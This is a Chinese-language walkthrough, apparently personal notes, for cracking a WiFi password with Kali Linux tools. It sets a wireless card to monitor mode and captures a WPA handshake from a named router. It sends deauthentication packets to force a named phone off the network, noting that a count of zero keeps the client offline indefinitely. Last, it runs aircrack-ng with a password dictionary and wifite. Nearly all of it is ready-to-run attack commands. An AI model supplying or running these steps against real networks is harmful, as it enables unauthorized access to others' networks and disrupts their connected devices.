天天看點

wifi破解

路由器的

78:44:FD:49:79:80

手機的

14:9D:09:C9:E2:ED

一:環境準備

kali系統

密碼字典(先将密碼字典拷貝到kali系統中)

自己寫一個:裡面包含wifi的密碼

vim /root/mima.txt

aptech123

二:破解流程

1:連接配接無線網卡

2:檢視網卡狀态

Iwconfig

3:設定網卡為監聽模式

airmon-ng check kill

airmon-ng start wlan0

4:掃描無線網絡

airodump-ng wlan0

記錄下來你要破解的那個路由器的BSSID,以及該路由器目前連接配接的手機的資訊station

還要記錄下路由器使用的信号通道

如果掃描不到,可以重複掃描,掃描到可以ctrl+c取消掃描,記下兩個mac和信道

5:抓取握手包(不要停止):

airodump-ng -c 6 --ivs -w test --bssid 78:44:FD:49:79:80  wlan0

-c:路由器使用的信号通道

--ivs:将抓取到的包儲存為ivs的檔案格式

-w:指定儲存的握手包的名字

--bssid:指定抓取到的路由器的實體位址

wlan0:kali系統的無線網卡的名字

6:再打開另一個終端對手機終端進行反認證攻擊

給連接配接到wifi的一個裝置發送一個deauth(反認證)包,讓那個裝置斷開wifi,随後它自然會再次連接配接wifi。

aireplay-ng -0 10 -a 78:44:FD:49:79:80 -c 14:9D:09:C9:E2:ED wlan0

-0(零):沖突攻擊模式,後面跟發送次數(設定為0,則為循環攻擊,不停的斷開連接配接,用戶端無法正常上網

-a:指定路由器的實體位址

-c:指定手機的實體位址

wlan0mon:kali系統的無線網卡的名字

7:利用密碼字典破解密碼

aircrack-ng -w /root/mima.txt /root/test-01.ivs

Wifite工具

root@kali:~# wifite –help

root@kali:~# ifconfig wlan0 down

root@kali:~# iwconfig wlan0 mode monitor

root@kali:~# ifconfig wlan0 up

root@kali:~# iwconfig

root@kali:~#wifite